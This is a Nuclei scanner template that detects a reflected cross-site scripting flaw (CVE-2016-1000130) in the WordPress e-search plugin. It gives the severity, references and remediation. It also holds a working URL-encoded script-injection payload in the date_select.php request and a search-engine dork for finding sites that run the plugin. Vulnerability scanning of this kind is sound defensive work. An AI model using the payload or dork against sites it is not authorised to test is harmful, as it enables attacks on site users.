nuclei-templates/http/cves/2016/CVE-2016-1000130.yaml

52 lines
2.1 KiB
YAML

id: CVE-2016-1000130
info:
name: WordPress e-search <=1.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: Wordpress plugin e-search 1.0 and before contains a cross-site scripting vulnerability via date_select.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
remediation: |
Update to the latest version of the WordPress e-search plugin to mitigate this vulnerability.
reference:
- https://wordpress.org/plugins/e-search
- http://www.vapidlabs.com/wp/wp_advisory.php?v=394
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000130
cwe-id: CWE-79
epss-score: 0.00093
epss-percentile: 0.38905
cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: e-search_project
product: e-search
framework: wordpress
google-query: inurl:"/wp-content/plugins/e-search"
tags: cve2016,cve,wordpress,xss,wp-plugin,e-search_project
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100a719a8cb3a8100d7d91dccc99b5be684916adaf315c8d120b43877ae55aa567602201dde91383a81ef65942fff909dfa56070a3eee978b08a564e9eb7f7874f235fd:922c64590222798bb761d5b6d8e72950